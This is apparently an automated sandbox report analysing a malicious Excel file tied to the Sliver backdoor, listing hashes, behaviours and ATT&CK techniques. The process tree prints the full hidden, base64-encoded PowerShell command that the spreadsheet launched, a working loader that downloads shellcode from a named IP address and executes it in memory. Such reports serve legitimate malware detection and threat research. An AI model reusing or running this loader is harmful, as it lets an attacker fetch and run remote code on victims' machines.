sliver | cd85c2fdcd8ca960bf77247d2707d8c982bb0a0f8d1390eca8e74064b01c7f60

General

Target

cd85c2fdcd8ca960bf77247d2707d8c982bb0a0f8d1390eca8e74064b01c7f60.xls
Size

46KB
MD5

cdacbcc06043403546aee2076b84a864
SHA1

0419744d77b7216c780b3ef2782c7c45280b5d8e
SHA256

cd85c2fdcd8ca960bf77247d2707d8c982bb0a0f8d1390eca8e74064b01c7f60
SHA512

07c6eceac262cd2f226f370d7a17fb0e5a25b2b790502f5adc39fd57547c02b1cf8796ca6de199425025882e77a58bc5672b4163606a74706e905ba44206db08
SSDEEP

768:54SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:mSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1044	1124	powershell.exe	82

Sliver RAT v2 6 IoCs

resource	yara_rule
behavioral2/memory/1044-71-0x000001B1A3EA0000-0x000001B1A491E000-memory.dmp	SliverRAT_v2
behavioral2/memory/1044-72-0x000001B1A53A0000-0x000001B1A5E86000-memory.dmp	SliverRAT_v2
behavioral2/memory/1044-75-0x000001B1A53A0000-0x000001B1A5E86000-memory.dmp	SliverRAT_v2
behavioral2/memory/1044-73-0x000001B1A53A0000-0x000001B1A5E86000-memory.dmp	SliverRAT_v2
behavioral2/memory/1044-74-0x000001B1A53A0000-0x000001B1A5E86000-memory.dmp	SliverRAT_v2
behavioral2/memory/1044-76-0x000001B1A53A0000-0x000001B1A5E86000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 23 IoCs

flow	pid	Process
22	1044	powershell.exe
24	1044	powershell.exe
32	1044	powershell.exe
36	1044	powershell.exe
37	1044	powershell.exe
38	1044	powershell.exe
39	1044	powershell.exe
40	1044	powershell.exe
41	1044	powershell.exe
42	1044	powershell.exe
43	1044	powershell.exe
56	1044	powershell.exe
58	1044	powershell.exe
59	1044	powershell.exe
60	1044	powershell.exe
61	1044	powershell.exe
62	1044	powershell.exe
63	1044	powershell.exe
64	1044	powershell.exe
65	1044	powershell.exe
66	1044	powershell.exe
67	1044	powershell.exe
68	1044	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1044	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1124	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1044	powershell.exe
1044	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1044	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1124	EXCEL.EXE
1124	EXCEL.EXE
1124	EXCEL.EXE
1124	EXCEL.EXE
1124	EXCEL.EXE
1124	EXCEL.EXE
1124	EXCEL.EXE
1124	EXCEL.EXE
1124	EXCEL.EXE
1124	EXCEL.EXE
1124	EXCEL.EXE
1124	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1124 wrote to memory of 1044	1124	EXCEL.EXE	87
PID 1124 wrote to memory of 1044	1124	EXCEL.EXE	87
PID 1044 wrote to memory of 5056	1044	powershell.exe	89
PID 1044 wrote to memory of 5056	1044	powershell.exe	89
PID 5056 wrote to memory of 2400	5056	csc.exe	91
PID 5056 wrote to memory of 2400	5056	csc.exe	91

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\cd85c2fdcd8ca960bf77247d2707d8c982bb0a0f8d1390eca8e74064b01c7f60.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1044
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1s0tjcv0\1s0tjcv0.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5056
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9FBA.tmp" "c:\Users\Admin\AppData\Local\Temp\1s0tjcv0\CSC516A8C18DA3B46779C34DDA8A362626.TMP"
      4⤵
      PID:2400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1s0tjcv0\1s0tjcv0.dll

Filesize
3KB

MD5
f109d588768df1b63fa2669ece0cb8ab

SHA1
1fe5fd5747ed3e95c724a4cfe1b7fe3aeb814a6e

SHA256
1d66ef778fb718a4c2370ef6f594c7e172db0db900b1a7587f71de723b1ee932

SHA512
c5608766f1a2e6f2e9b6bed9b9caa7b3c40350145212ccf260ae4b8cc89c0d7fd32366a4ee396f0ab458094a9ae42db4c42cc9b66ac240caf92b93bb0d8b7701

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9FBA.tmp

Filesize
1KB

MD5
7a7badf8ba982af58e8d9c296979bfd9

SHA1
1c8b3f2f062445c9612bc3345f1c1c0b862f7bd4

SHA256
d06a2b3dec394abac27fe615109cb6ce9bcf10a2e0096e548dd951c2c03cb3e2

SHA512
aca6c2c082c027079640339b66c84be5650683b13be97945fd7a3a024dee94f11a3418d1708dbe75e6a7fa9b4f6dcbaf0778cb4096ed29c64db6b777dbe4c2f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wzbnt0ih.4hi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
3KB

MD5
522db2387516c9f4807eaba0727ee443

SHA1
85f48e7e4802d9aa6cda194ee758c54f577cd738

SHA256
b1cbace165d56b7796a8b0a039ac7f23dbc747d816e0ebd78fe70fb3c8c17c70

SHA512
76198d20f7df60aaf1d1badbb65b56bd8f49721e16ff733a7781c954b40733ebdc3787b2e2cb80e8da9982b5568ca6298b41e114591389061477da10d6b31453

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1s0tjcv0\1s0tjcv0.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1s0tjcv0\1s0tjcv0.cmdline

Filesize
369B

MD5
7065a8625a8c53bf399e98edf9ee12b3

SHA1
23551596c03ad8e3d93ddc1deb4368285d22f346

SHA256
2f129cb2951409cc966299f59e519118977bc96d227b3ad36634021fc0bb31ee

SHA512
1c857efe3c7725726d3753c01e42c356a271c930cbd369d3a85892187232d1394d716635c3bf72fd432bc1bbfd683112494cc20bee276740ff0c623ebd72d77c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1s0tjcv0\CSC516A8C18DA3B46779C34DDA8A362626.TMP

Filesize
652B

MD5
162d1455289b3100e6bd5412a235a8d1

SHA1
6c8d288b35ecedfe4f65d9ddc6f36d5f669716c2

SHA256
adb1c6315128e8ef41dc79db731953be590df311224f12a2bd14a9cca557a9d3

SHA512
4fd976c5d2ee11df65a365106af111c65efd2cf1aaa7747e6fd84ed91b096a37e8e2dd4fa11964145b280718c674717592edf7211b305cd73f29a423e152d3aa

Download Submit
memory/1044-73-0x000001B1A53A0000-0x000001B1A5E86000-memory.dmp

Filesize
10.9MB

Download
memory/1044-55-0x000001B1A35D0000-0x000001B1A35D8000-memory.dmp

Filesize
32KB

Download
memory/1044-71-0x000001B1A3EA0000-0x000001B1A491E000-memory.dmp

Filesize
10.5MB

Download
memory/1044-72-0x000001B1A53A0000-0x000001B1A5E86000-memory.dmp

Filesize
10.9MB

Download
memory/1044-75-0x000001B1A53A0000-0x000001B1A5E86000-memory.dmp

Filesize
10.9MB

Download
memory/1044-35-0x000001B1A35A0000-0x000001B1A35C2000-memory.dmp

Filesize
136KB

Download
memory/1044-74-0x000001B1A53A0000-0x000001B1A5E86000-memory.dmp

Filesize
10.9MB

Download
memory/1044-76-0x000001B1A53A0000-0x000001B1A5E86000-memory.dmp

Filesize
10.9MB

Download
memory/1124-12-0x00007FFC27230000-0x00007FFC27240000-memory.dmp

Filesize
64KB

Download
memory/1124-1-0x00007FFC6954D000-0x00007FFC6954E000-memory.dmp

Filesize
4KB

Download
memory/1124-2-0x00007FFC29530000-0x00007FFC29540000-memory.dmp

Filesize
64KB

Download
memory/1124-23-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-24-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-13-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-14-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-15-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-17-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-16-0x00007FFC27230000-0x00007FFC27240000-memory.dmp

Filesize
64KB

Download
memory/1124-8-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-7-0x00007FFC29530000-0x00007FFC29540000-memory.dmp

Filesize
64KB

Download
memory/1124-9-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-59-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-60-0x00007FFC6954D000-0x00007FFC6954E000-memory.dmp

Filesize
4KB

Download
memory/1124-61-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-11-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-67-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-10-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-3-0x00007FFC29530000-0x00007FFC29540000-memory.dmp

Filesize
64KB

Download
memory/1124-5-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-6-0x00007FFC694B0000-0x00007FFC696A5000-memory.dmp

Filesize
2.0MB

Download
memory/1124-4-0x00007FFC29530000-0x00007FFC29540000-memory.dmp

Filesize
64KB

Download
memory/1124-0-0x00007FFC29530000-0x00007FFC29540000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads